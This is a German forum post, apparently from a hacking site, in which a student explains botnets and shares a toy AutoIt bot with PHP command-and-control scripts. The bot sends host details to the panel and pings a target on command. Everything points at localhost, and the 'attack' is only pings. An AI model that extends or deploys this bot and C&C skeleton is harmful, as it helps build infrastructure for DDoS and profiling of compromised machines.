Was ist ein Bot/Botnet?
Ein Botnet oder Botnetz ist eine Gruppe von Software-Bots. Die Bots laufen auf vernetzten Rechnern, deren Netzwerkanbindung sowie lokale Ressourcen und Daten ihnen zur Verfügung stehen. Betreiber illegaler Botnetze installieren die Bots ohne Wissen der Inhaber auf Computern und nutzen sie für ihre Zwecke. Die meisten Bots können von einem Botnetz-Operator (auch Bot-Master oder Bot-Herder genannt) über einen Kommunikationskanal überwacht werden und Befehle empfangen. Dieser wird in der Fachsprache zutreffend als Command-and-Control-Server bezeichnet; Kurzform: C&C.
Kommen wir zur Erklärung:
Als erstes erstellt der Bot die HWID des Computers.
Anschließend übergibt er sie an das Webpanel. (index.php)
Nun Überprüft er dort ob die HWID gleich der ist welche im Script steht.
(Wenn ihr es testen wollt gibt es am ende eine Anleitung)
(In einem richtigem Bot würde überprüft werden ob der Bot schon existiert)
Wenn das nicht der Fall ist, dann wird dem Webpanel (get.php) die Daten des Computers gesendet. Wenn es doch der Fall ist, wird überprüft ob es eine Aufgabe gibt die zu erledigen ist. Wenn auch dies der Fall ist wird die Seite angegriffen. Hier spärlich gezeigt mit einem Ping(*) Befehl, in richtigen Bots wird das ganze expliziter und stärker ausgeführt.
Zum Übergeben der Daten:
Hier werden die Daten des Computers an das Webpanel übergeben und normalerweise in eine Datenbank eingetragen. Hier habe ich es zur Veranschaulichung in eine Textdatei namens „bots.txt“ gespeichert.
Diese Daten dienen dem Botuser dazu um gezielte Angriffe aus verschiedenen Ländern oder mit verschiedenen Betriebsystemen zu starten.
Zu den Aufgaben:
Hier wird nochmals die HWID übergeben, stimmt diese mit der im Script überein wird die Aufgabe getätigt.
Bei einem echten Bot wird hier überprüft ob für dieses Computer Aufgaben bereitstehen welche dann Abgearbeitet werden.
So, ich hoffe euch hat mein Einstieg gefallen und ich freue mich über Feedback. Mein Lehrer hat mich dann am Ende gefragt ob ich die Gruppe „Anonymous“ kenne und damit was zu tun hätte, aber dennoch habe ich eine 1+ dafür bekommen ;)
Hier ist der Source des Bots (Autoit):
[php]#include <string.au3>
$HWID = _HWID()
While 1
If BinaryToString(InetRead("http://localhost/Bot/index.php?hwid=" & $HWID)) = "False" Then
_SendData()
Else
_Check()
EndIf
Sleep(50)
WEnd
Func _SendData()
$CPU = @CPUArch
$OS = @OSVersion ;Gibt einen der folgenden Werte zurück: "WIN_2008R2", "WIN_7", "WIN_2008", "WIN_VISTA", "WIN_2003", "WIN_XP", "WIN_2000".
$NAME = @ComputerName
$SPEAK = _SPEAK()
If BinaryToString(InetRead("http://localhost/Bot/get.php?hwid=" & $HWID & "&cpu=" & $CPU & "&os=" & $OS & "&lang=" & $SPEAK & "&name=" & $NAME)) = "True" Then
_Check()
Else
MsgBox(0, "", "False!")
EndIf
EndFunc
Func _HWID()
$osdrive = StringLeft(@SystemDir, 3)
$original = "0"&@CPUArch & @KBLayout & DriveGetSerial("C:\") & StringUpper(DriveGetType($osdrive)) & DriveSpaceTotal ($osdrive)
$string2 = StringMid($original, Round(StringLen($original)/2), Round(StringLen($original)/2))
$string2_mod = _StringToHex(_StringReverse($string2))
$original = _StringEncrypt(1, $original, $string2_mod, 4)
Return $original
EndFunc
Func _SPEAK()
Select
Case StringInStr("0413 0813", @OSLang)
Return "Niederländisch"
Case StringInStr("0409 0809 0c09 1009 1409 1809 1c09 2009 2409 2809 2c09 3009 3409", @OSLang)
Return "Englisch"
Case StringInStr("040c 080c 0c0c 100c 140c 180c", @OSLang)
Return "Französisch"
Case StringInStr("0407 0807 0c07 1007 1407", @OSLang)
Return "Deutsch"
Case StringInStr("0410 0810", @OSLang)
Return "Italienisch"
Case StringInStr("0414 0814", @OSLang)
Return "Norwegisch"
Case StringInStr("0415", @OSLang)
Return "Polnisch"
Case StringInStr("0416 0816", @OSLang)
Return "Portugiesisch"
Case StringInStr("040a 080a 0c0a 100a 140a 180a 1c0a 200a 240a 280a 2c0a 300a 340a 380a 3c0a 400a 440a 480a 4c0a 500a", @OSLang)
Return "Spanisch"
Case StringInStr("041d 081d", @OSLang)
Return "Schwedisch"
Case Else
Return "Error"
EndSelect
EndFunc
Func _Check()
If BinaryToString(InetRead("http://localhost/Bot/get.php?job=True")) = "True" Then $SITE = BinaryToString(InetRead("http://localhost/Bot/get.php?hwid=" & $HWID))
For $i = 0 To 100 Step +1
Ping($SITE)
ConsoleWrite($i)
Next
EndFunc[/php]
Hier ist die index.php:
[php]<?php
$HWID = "PLEASE INSERT YOUR HWID";
$GHWID = htmlspecialchars($_GET["hwid"]);
If($HWID==$GHWID) echo "True";
else echo "False";
?>[/php]
Hier ist die get.php:
[php]<?php
$GHWID = htmlspecialchars($_GET["hwid"]);
$GCPU = htmlspecialchars($_GET["cpu"]);
$GOS = htmlspecialchars($_GET["os"]);
$GSPEAK = htmlspecialchars($_GET["lang"]);
$GNAME = htmlspecialchars($_GET["name"]);
$handle = fopen ("bots.txt", a);
fwrite ($handle, "————————–\r\n" );
fwrite ($handle, "Hardware-ID:".$GHWID."\r\n" );
fwrite ($handle, "CPU-Architektur:".$GCPU."\r\n" );
fwrite ($handle, "Betriebsystem:".$GOS."\r\n" );
fwrite ($handle, "Sprache:".$GSPEAK."\r\n" );
fwrite ($handle, "PC Name:".$GNAME."\r\n" );
fwrite ($handle, "————————–\r\n\r\n" );
fclose ($handle);
echo "True"
?>[/php]
Hier ist die job.php:
[php]<?php
$HWID = "PLEASE INSERT YOUR HWID";
$functions = "True";
$GHWID = htmlspecialchars($_GET["hwid"]);
$GJOB = htmlspecialchars($_GET["job"]);
If($functions == $GJOB) echo "True";
If($HWID == $GHWID) echo "http://www.google.de";
?>[/php]
Wenn ihr es austesten wollt müsst ihr bei $HWID eure HWID eintragen diese bekommt ihr wenn ihr diese Funktion ausführt:
[php]#include <string.au3>
$i = MsgBox(4, "Wollen sie ihre HWID in den Zwischenspeicher kopieren?", "Ihre HWID lautet: " & _HWID() & @CRLF & @CRLF & "Wollen sie nun die HWID in den Zwischenspeicher kopieren?")
If $i = 6 Then
ClipPut(_HWID())
Else
Exit
EndIf
func _HWID()
$osdrive = StringLeft(@SystemDir, 3)
$original = "0"&@CPUArch & @KBLayout & DriveGetSerial("C:\") & StringUpper(DriveGetType($osdrive)) & DriveSpaceTotal ($osdrive)
$string2 = StringMid($original, Round(StringLen($original)/2), Round(StringLen($original)/2))
$string2_mod = _StringToHex(_StringReverse($string2))
$original = _StringEncrypt(1, $original, $string2_mod, 4)
Return $original
EndFunc[/php]
Wichtig hierbei ist, das es nur Funktioniert wenn in der Index.php die HWID anfänglich Falsch ist damit das Script Funktioniert!
Quelle : back2hack.cc